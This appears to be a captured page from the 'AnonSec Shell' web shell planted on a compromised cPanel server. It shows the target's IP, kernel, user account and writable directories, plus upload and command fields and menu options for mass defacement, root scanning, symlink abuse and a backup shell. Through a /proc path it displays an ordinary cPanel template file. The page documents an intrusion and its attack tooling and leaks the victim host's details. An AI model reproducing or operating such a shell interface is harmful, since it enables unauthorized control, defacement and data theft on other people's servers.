AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.146   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2388322/root/proc/2388322/cwd/frontend/jupiter/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/2388322/root/proc/2388322/cwd/frontend/jupiter/landing.html.tt
[%
    #A generic landing page for a single UAPI call.
    #
    #Please do NOT use this unless for some reason you can’t do
    #an in-page AJAX call.
    #
    #Parameters:
    #   - uapi_module    (for the UAPI call)
    #   - uapi_func
    #   - uapi_data      (JSON-encoded)
    #

    SET api = execute(
        RAW_FORM.uapi_module,
        RAW_FORM.uapi_func,    #hack, but this is a landing page, after all
        JSON.parse( RAW_FORM.uapi_data ),
    );


    # app_key should *never* be allowed to be set by the client, see SEC-405
    WRAPPER '_assets/master.html.tt'
        app_key = 'email_accounts'
    ;
-%]

<div class="body-content">
    [% IF api.status %]
    <div id="success" class="alert alert-success">
        <span id="successImg" class="glyphicon glyphicon-ok-sign"></span>
        <span id="successMsg" class="text">
            [% locale.maketext("Success!") %]
        </span>
    </div>
    [% ELSE %]
    <div id="error" class="alert alert-danger">
        <span id="errorImg" class="glyphicon glyphicon-exclamation-sign"></span>
        <span id="errorMsg" class="text">
            [% FOREACH q = api.errors %]
                [% q.html() %]
            [% END %]
        </span>
    </div>
    [% END %]

    [% INCLUDE _assets/return_link.html.tt return_location='javascript:history.go(-1)' return_link_text=locale.maketext('Go Back') %]

</div>

[% END #wrapper -%]

Anon7 - 2022
AnonSec Team